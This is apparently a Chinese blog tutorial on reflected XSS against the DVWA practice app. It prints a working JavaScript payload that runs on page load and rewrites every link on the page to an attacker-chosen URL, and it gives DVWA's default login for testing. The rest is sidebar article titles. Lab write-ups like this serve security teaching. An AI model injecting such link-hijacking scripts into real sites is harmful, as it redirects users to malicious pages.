当前位置:网站首页>XX攻击——反射型 XSS 攻击劫持用户浏览器
XX攻击——反射型 XSS 攻击劫持用户浏览器
2022-07-01 08:06:00 【Cwillchris】
我们先构建一个反射型的 XSS 攻击跳转到存在漏洞的页面。其实也可以在 DVWA 中直接进行攻击,但是我们处于演示目的构造了一个相对复杂的环境。
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href="http://www.baidu.com";}
}
</script>
JavaScript 代码分析 window.onload 当网页加载完成时,执行 function 匿名函数
函数功能:document.getElementsByTagName 获取页面中所有的 a 标签,存放到 link 数组中,使用 for 循环将 link 数组中的所有元素替换为恶意网址。
打开 chrome 浏览器,我们在反射型 XSS 中进行测试效果
登录 http://192.168.98.66/DVWA-master/login.php 用户名: admin 密码:password ,改为low级别
边栏推荐
- Scala语言学习-07-构造器
- Aardio - Shadow Gradient Text
- OJ输入输出练习
- How relational databases work
- OJ input and output exercise
- [kv260] generate chip temperature curve with xadc
- Latex table
- SharePoint - modify web application authentication using PowerShell
- Office365 - how to use stream app to watch offline files at any time
- [MySQL learning notes 28] storage function
猜你喜欢
![[batch DOS CMD summary] extension variables - delay variables CMD /v:on, CMD /v:off, SETLOCAL enabledelayedexpansion, disabledelayedexpansion](/img/ce/6c9e4f2c54710610e8b1f68d6d8088.png)
[batch DOS CMD summary] extension variables - delay variables CMD /v:on, CMD /v:off, SETLOCAL enabledelayedexpansion, disabledelayedexpansion
![[untitled]](/img/d9/5e97f2de256b9749131b5bf1437d24.png)
[untitled]
![[getting started] input n integers and output the smallest K of them](/img/b8/20852484f10bc968d529e9c1ff5480.png)
[getting started] input n integers and output the smallest K of them
![[redis] it takes you through redis installation and connection at one go](/img/ca/89cb18f0eeb835f021d6a2489681a1.png)
[redis] it takes you through redis installation and connection at one go
P4 安装bmv2 详细教程
【批处理DOS-CMD-汇总】扩展变量-延迟变量cmd /v:on、cmd /v:off、setlocal enabledelayedexpansion、DisableDelayedExpansion
Array: question brushing record
【Redis】一气呵成,带你了解Redis安装与连接
Access报表实现小计功能
window c盘满了
随机推荐
SQL number injection and character injection
Php laraver Wechat payment
0 basic introduction to single chip microcomputer: how to use digital multimeter and precautions
Serial port oscilloscope software ns-scope
How relational databases work
Basic knowledge of MATLAB
量化交易之读书篇 - 《征服市场的人》读书笔记
php laravel微信支付
LSTM of RNN
Gru of RNN
【mysql学习笔记26】视图
使用threejs简单Web3D效果
Instead of houses, another kind of capital in China is rising
web254
Significance and measures of source code encryption
Li Kou daily question - day 31 -1502 Judge whether an arithmetic sequence can be formed
On June 30, 2022, the record of provincial competition + national competition of Bluebridge
Teach you how to apply for domestic trademark online step by step
Rk3399 platform development series explanation (network debugging) 7.30. What will affect the sending process of TCP packets?
Contenttype comparison of all types